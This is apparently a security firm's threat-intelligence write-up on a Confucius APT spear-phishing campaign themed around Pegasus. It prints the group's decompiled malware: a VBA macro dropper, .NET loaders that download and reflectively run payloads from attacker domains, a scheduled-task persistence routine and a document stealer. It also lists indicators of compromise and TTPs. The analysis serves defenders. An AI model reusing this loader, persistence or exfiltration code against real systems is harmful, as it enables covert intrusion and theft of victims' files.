Unraveling Confucius’ Espionage Campaigns

Published: Tue 26 Oct, 21
Authors: Ahmad Muneeb Khan, Syed Hasan Akhtar
Acknowledgements: Dr. Farrukh Shahzad

Background

Confucius, an Indian state-sponsored APT group, continues to target Defense and Government organizations in South-Asia, especially Pakistan. The primary purpose of the TA appears to conduct espionage campaigns and steal information critical to the operations of the targeted institutes.

In August 2021, the release of Amnesty International’s advisory on Pegasus Spyware by Israel’s NSO Group was the source of major unrest in the country’s politicians and other elite individuals. Capitalizing on this unrest, Confucius began to lure such individuals by means of a bi-partite email wherein the first email was a simple informational mail against Pegasus and the second email contained an encrypted document (with the password of the document mentioned in the same email). Technical analysis of the document and the entire attack chain points towards a well-thought espionage campaign, a new for Confucius.

In late September 2021, the same campaign was re-run wherein the only changes we witnessed were the domains which were used for payload acquisition and data exfiltration. The flow of the whole attack chain can be seen below:

Figure 1: Execution flow of complete attack chain

Reports of a potential intrusion by Confucius were first disclosed by researchers on Twitter. Analysis of the campaign by our researchers is discussed in detail in the following sections:

Macro-enabled Word Document

Confucius heavily relies on Microsoft Word documents to deliver spear-phishing emails to their targets. Previously, these Word documents had external relationships to malicious templates (for template injection). More recently, the group appears to have made a switch to using malicious VBA macros.

Using the Document_Open method, the macro executes two functions; one to write the binary to disk (eventually loading it) and the second to update the caption of an image embedded within the document. The function MyColor takes in the value of the Comments property of the active document, opens the handle to a file in the Temp directory, and writes the data (after converting it to binary) to disk.

Sub Mycolor()
Dim prop As DocumentProperty
  For Each prop In ActiveDocument.BuiltInDocumentProperties
    If prop.Name = "Comments" Then
      s = prop.Value
    End If
  Next
fnum = FreeFile
FName = Environ("TMP") & "\skfk.txt"
Open FName For Binary As #fnum
  Put #fnum, , abc(CStr(s))
Close #fnum
fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
CreateObject("WScript.Shell").Run Result, 0, True
End Sub

Snippet 1: VBA Macros Embedded Inside Lure

Once written, the binary is loaded into memory using PowerShell’s implementation of the Reflection API (or more specifically, the LoadFile method in the class). The LoadFile method takes in one parameter which is the .NET assembly. Later, an object of Class1 is instantiated and the sadkj procedure is called.

.NET Downloader/Loader

Static analysis of the binary suggests that it is in fact a dynamic-link library (.NET assembly) with a modified ‘compile timestamp’ pointing to 2050. The function sadkj instantiates another object of the same class and attempts to call the function sdlfghjgks from it.

public void sadkj()
{
  string str = Path.GetTempPath() + "skfk.txt";
    new Process
    {
      StartInfo =
      {
        FileName = "powershell.exe",
        Arguments = "[Reflection.Assembly]::LoadFile('" + str + "');$t = New-Object Tysdf.Class1;$t.sdlfghjgks()",
        WindowStyle = ProcessWindowStyle.Hidden
      }
    }.Start();
    Environment.Exit(0);
}

Snippet 2: .NET Loader

This function is interesting as it references a URL to acquire (what looks like another DLL masqueraded as a .TXT file) a file from the C2 infrastructure. To summarize the function, it downloads the .TXT file from the URL referencing the domain inshaaldom.xyz, loads the assembly by converting the ASCII payload to binary via the moon function, acquires the types from the assembly, instantiates them and dynamically invokes the ndmsbfl function from the recently acquired assembly.

public void sdlfghjgks()
{
  WebClient webClient = new WebClient();
  string uriString = "https://inshaaldom.xyz/SowpnTdb.txt";
  try
  {
    string sweiorut = webClient.DownloadString(new Uri(uriString));
    Type[] types = Assembly.Load(this.moon(sweiorut)).GetTypes();
    for (int i = 0; i < types.Length; i++)
    {
      object arg = Activator.CreateInstance(types[i]);
      if (Class1.<>o__3.<>p__0 == null)
      {
        Class1.<>o__3.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "ndmsbfl", null, typeof(Class1), new CSharpArgumentInfo[]
        {
          CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
        }));
  ...
}

Snippet 3: Payload Acquisition and Dynamic Invocation of Scheduler

.NET Task Scheduler  

Static analysis of SowpnTdb.txt (DLL) led us to identify some interesting strings. The embedded PDB path F:\Hacking Notes - Documents\Projects\project-05\SowpnTdb\SowpnTdb\bin\Release\ILMerge\SowpnTdb.pdb (in one of the intrusions from the campaign) indicated several projects were in-line to continue the attack campaign. Several meta-data fields of the binary pointed towards it being a Task Scheduler, likely acquired from the GitHub. Recon on GitHub pointed towards a .NET wrapper for the Task Scheduler API exposed by Windows which was a direct match of the codebase used by the Scheduler. This highlights the fact that Confucius utilizes open-source projects in their operations. We’ve also previously identified similar patterns of using open-source tools (OSTs) from their (potential) sister-group, Sidewinder.

Analysis of the function ndmsbfl suggests it downloads another DLL (jksdfhk.txt) from the server (same domain as before) and drops it to C:\ProgramData. Following that, a task titled Systemcheck is scheduled to run a PowerShell command every five minutes. Scheduled commands are the previously covered dynamic invocation calls with the Reflection API being used to load the recently dropped DLL.

public void ndmsbfl()
{
  new WebClient().DownloadFile(new Uri("https://parinari.xyz/Msdjkfh.txt"), "C:\\ProgramData\\jksdfhk.txt");
  new TaskService();
  TimeTrigger trigger = new TimeTrigger
  {
      Repetition = new RepetitionPattern(TimeSpan.FromMinutes(5.0), TimeSpan.FromDays(0.0), false)
  };
  string path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
  string arguments = "-windowstyle hidden -C $rk = \"\"\"C:\\ProgramData\\jksdfhk.txt\"\"\";[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()\" ";
  TaskService.Instance.AddTask("Systemcheck", trigger, new ExecAction(path, arguments, null), null, null, TaskLogonType.InteractiveToken, null);
}

Snippet 4: .NET Task Scheduler

Final .NET Loader

The final .NET loader has similar operations to what we’ve witnessed in the previous loader binaries. Here’s a summary of the operations in this particular loader:

  • Downloads another payload (Rwlksdnasjd.txt) from the domain, inshaaldom.xyz (a DLL masquerading as a TXT file)
  • The payload is converted into binary
  • Classes are instantiated from the recently converted binary
  • The function, sdsdjkfhds, is dynamically invoked
public void Nasuyd()
{
  WebClient webClient = new WebClient();
  string uriString = "https://parinari.xyz/Rwlksdnasjd.txt";
  try
  {
    string st = webClient.DownloadString(new Uri(uriString));
    Type[] types = Assembly.Load(this.Houn(st)).GetTypes();
    for (int i = 0; i < types.Length; i++)
    {
      object arg = Activator.CreateInstance(types[i]);
      if (Class1.<>o__1.<>p__0 == null)
      {
        Class1.<>o__1.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "sdsdjkfhds", null, typeof(Class1), new CSharpArgumentInfo[]
        {
          CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null)
        }));
      }
  ...
}

Snippet 4: Final .NET loader

Stealer

Continuing the analysis with the last invoked function, sdsdjkfhds, the metadata of the DLL (Rwlksdnasjd.txt) and several network calls inside the DLL further strengthen the fact that it is in fact an uploader. A snippet of the function is listed below:

public void sdsdjkfhds()
{
  string userName = Environment.UserName;
  List<string> pfhl = new List<string>();
  string pattern = "*";
  pfhl = this.Gpufh();
  "C:\\\\Users\\\\" + userName;
  string tdn = Environment.MachineName + "__" + userName;
  this.CUD(tdn, 0);
  foreach (string text in Directory.GetDirectories("C:\\Users\\"))
  {
    if (text != "C:\\Users\\Default" || text != "C:\\Users\\Public")
    {
      this.GF(text + "\\Documents\\", pattern, "Documents", pfhl);
      this.GF(text + "\\Downloads\\", pattern, "Downloads", pfhl);
      this.GF(text + "\\Desktop\\", pattern, "Desktop", pfhl);
      this.GF(text + "\\Pictures\\", pattern, "Pictures", pfhl);
    }
  }
  DriveInfo[] drives = DriveInfo.GetDrives();
  char[] trimChars = new char[]
  {
    ':',
    '\\'
  };
  foreach (DriveInfo driveInfo in drives)
  {
    if (driveInfo.Name != "C:\\")
    {
      this.GF(driveInfo.Name, pattern, driveInfo.Name.TrimEnd(trimChars), pfhl);
    }
  }
  Environment.Exit(0);
}

Snippet 5: Stealer and Uploader

Capabilities of the Stealer are:

  • Collect information of all local drives
  • Download a file of MD5 hashes (specific for the Machine and Username of the compromised workstation) from the C2 server
  • Find and ex-filtrate files with extensions TXT, PDF, PNG, JPG, ODS, DOC, XLS, XLM, ODP, ODT, RTF, PPT, PPTX, XLSX, XLSM, DOCX, JPEG
    • Files are hashed (MD5) before being ex-filtrated and compared against the MD5 hash list previously acquired from the C2 server. Files which have already been ex-filtrated are not uploaded to the server again.
private void GF(string path, string pattern, string ufn, List<string> pfhl)
{
  ...

  try
  {
    list.AddRange(Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly));
    foreach (string text in list)
    {
      ...
      if (a == "txt" || a == "TXT" || a == "pdf" || a == "PDF" || a == "png" || a == "PNG" || a == "jpg" || a == "JPG" || a == "DOC" || a == "doc" || a == "XLS" || a == "xlm" || a == "XLM" || a == "xls" || a == "odp" || a == "ODP" || a == "ods" || a == "ODS" || a == "odt" || a == "ODT" || a == "rtf" || a == "RTF" || a == "ppt" || a == "PPT" || a2 == "xlsx" || a2 == "XLSX" || a2 == "xlsm" || a2 == "XLSM" || a2 == "docx" || a2 == "DOCX" || a2 == "pptx" || a2 == "PPTX" || a2 == "jpeg" || a2 == "JPEG")
      {
      list2.Add(text);
      }
    }  
    
    ...  

    foreach (string text3 in list2)
    {
      if (!(text3 == ""))
      {
        string item;
        using (MD5 md = MD5.Create())
        {
          using (FileStream fileStream = File.OpenRead(text3))
          {
            item = BitConverter.ToString(md.ComputeHash(fileStream)).Replace("-", "");
          }
        }
        if (!pfhl.Contains(item))
        {
          list3.Add(text3);
          list4.Add(item);
        }
      }
    }
  }

  if (list3.Count != 0)
  {
    this.CUD(text2, 1);
    ...
  }

    ...
}

Snippet 6: Capabilities of the Stealer

Although the payload acquisition domain does encrypt its communication with the compromised host (via HTTPS), the exfiltration domain, thakithaiya.xyz uses the plain-text HTTP protocol to send/receive data from the C2 server. Similar to the earlier campaigns carried out by Confucius, the web pages are written in PHP (with random URIs and parameter names to collect usernames/machine name). Since the task is scheduled for a five minute run, the uploader runs the same routine over and over, collecting files and folders from the system, until terminated.

Indicators of Compromise

Following Indicators of Compromise were discovered during the course of our intrusion analysis:

Files

File NameTypeHash
Ticket00073146.docmMD5
SHA1
SHA256
a91be9529d06cd4a6c06a01b5c595630
814367a04163802d5e124e599772c6a3ba681a78
034cfe57d26cfea4139cf7bb387b9ba8f8705e44d3868e5edc36af0f7a8aa5bf
Tysdf.dll (skfk.txt)MD5
SHA1
SHA256
ae3e8679df2976d31da858fd7af67185
4c6c04af547b7df04e3bdb3f69e812a30b200016
ea7a951dbd93d5ef6ca535820499da29753331e1e8a38c6fef9398a57a679ef0
 Msdjkfh.dll (jksdfhk.txt)MD5
SHA1
SHA256
5397cbaf89ff40a8b08004ac5164c8a0
17f1e33763cb6e5ae6b39f3f28bc695ac597ce7b
bf50438e10e8ed3eaa7949440a6ac4bdc55305aa2bfe75fa1997feaf0cbc9d50
Rwlksdnasjd.dll (Stealer)MD5
SHA1
SHA256
457101ea5c30c53f9381d7e9aa6432a4
e554c0ef069fe5a49919bea560003cfccd69f858
43698d70087aa875c4384b59cacd8eff56bd0bff3be20e69b98613ec5184b41f
SowpnTdb.txt (Scheduler)MD5
SHA1
SHA256
4461412acfc3988974355d4c1601d3f6
33596fbe26e556bb2610739f070b66a2cf532eda
63ca532a13ff909b4b7f72b9a094fa3fc59713984f645664c95a66f14be5f96a

File Paths

File PathDescription
%Temp%\skfk.txt.NET DLL dropped by the Word document; used to load the next stage into memory
C:\ProgramData\jksdfhk.txt.NET DLL dropped by SownpnTdb.dll; used to load the next stage into memory

Scheduled Tasks

Task NameTask Occurence
SystemcheckEvery five minutes

Domains/IPv4 Addresses

Domain NameProtocolUsageIPv4 Address
thakithaiya.xyzHTTPExfiltration80.209.238.155
pirnaram.xyzHTTPExfiltration34.98.99.30, 62.77.153.51
inshaaldom.xyzHTTPSPayload Acquisition104.21.10.162, 172.67.146.1
parinari.xyzHTTPSPayload Acquisition34.98.99.30, 104.21.86.125, 172.67.219.211

YARA Rules

Yara rules to detect the Loader and Stealer used by Confucius in their recent cyber-espionage campaigns can be found at our GitHub repository.

Tactics, Techniques and Procedures

Following tactics, techniques, and procedures are actively used by Confucius in their intrusions:

DomainIDNameDescription
T1598Gather Victim Identity InformationConfucius extensively gathers the victim’s identifying information to target them via effective lures
T1583Acquire InfrastructureConfucius acquires new infrastructure (discussed in next techniques) a month before each new campaign
T1583.001Acquire Infrastructure: DomainsConfucius typically registers two new domains as part of their infrastructure; one to acquire payloads from and another to ex-filtrate data to
T1583.004Acquire Infrastructure: ServerConfucius acquires virtual private servers to acquire payloads from and ex-filtrate data to during the Command and Control phase
T1566Phishing/Spearphishing AttachmentConfucius heavily relies on Spearphishing (attachments) to compromise their targets. Targeted emails in the past lured users into opening attachments (often encrypted; passwords being mentioned in the email’s content) by utilizing decoy documents including Payrolls, Pegasus (defenses against it), and others
T1053.005Scheduled Task/Job: Scheduled TaskConfucius schedules a Task on the compromised system to re-execute the malicious payload (every five minutes)
T1036MasqueradingDynamic-link Libraries (.DLL) files used by Confucius to load the payload from subsequent stages was masquerading as .TXT (plain-text) files on the filesystem
T1083File and Directory DiscoveryThe final-stage stealer deployed by Confucius extensively searches the filesystem for matches on particular file extensions and ex-filtrates the identified files to the C2 server
T1082System Information DiscoveryThe final-stage stealer deployed by Confucius also collects information about the compromised system such as drives, machine name, and users for exfiltration and later downloading hash lists for comparisons
T1059.001Command and Scripting Interpreter: PowerShellConfucius heavily relies on the reflection API exposed by PowerShell to load/execute their DLLs in memory leaving minimal footprints on the compromised system’s disk
T1005Data from Local SystemConfucius collects data such as files and folders from the compromised system in an automated fashion to ex-filtrate to their server
T1071.001Application Layer Protocol: Web ProtocolsConfucius serves its command and control server using the web protocols, HTTP and HTTPS
T1573.002Encrypted Channel: Asymmetric CryptographyConfucius uses Asymmetric Cryptography to encrypt its communication over web protocols and communicate with the C2 server
T1041Exfiltration over C2 ChannelConfucius ex-filtrates data collected from the compromised system to the C2 channel
T1029Scheduled TransferScheduled jobs also implement a schedule to transfer/ex-filtrate files from the compromised system and acquire a hash file to match hashes against and exclude files which have already been delivered to Confucius’ C2 server

Operational Security Failure

While performing reconnaissance against the infrastructure of Confucius, we found a deviation from their normal pattern of operations. Confucius highly utilizes C2 domains bought from the registrar, GoDaddy, using different US-based addresses to do so. However, the primary C2 domain in the recent campaign, inshaaldom.xyz, and the C2 domain used in the campaign in August 2021, parinari.xyz, were both registered from Chandigarh, India. We consider this to be an operational mistake from the operators behind Confucius revealing their origin.

Figure 2: C2 domain registered in India deviating from usual domain registration pattern of Confucius

Outlook

The selection of techniques by Confucius are not very sophisticated at the moment along with some operational security failures however; analysis of the campaign highlighted the creativity of its operators and their potential to increase sophistication in the future.

Previous campaigns by Confucius utilized techniques like Template Injection in spear-phishing documents; However, the current campaign makes use of macros and an embedded PE in the comments of a picture inside the document. These minor changes in techniques suggest the group is actively looking to switch their tradecraft to avoid detections based on named rulesets.

More From My Blog






    Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response






      Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response






        Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response






          Cybersecurity ServicesCloud SecuritySecurity Assessment ServicesTailored Security for StartupsTailored Security for StartupsSecurity R&DDetection and Response ServicesCustom EngineeringManaged SOCOtherIncident Readiness and Response

          Get In Touch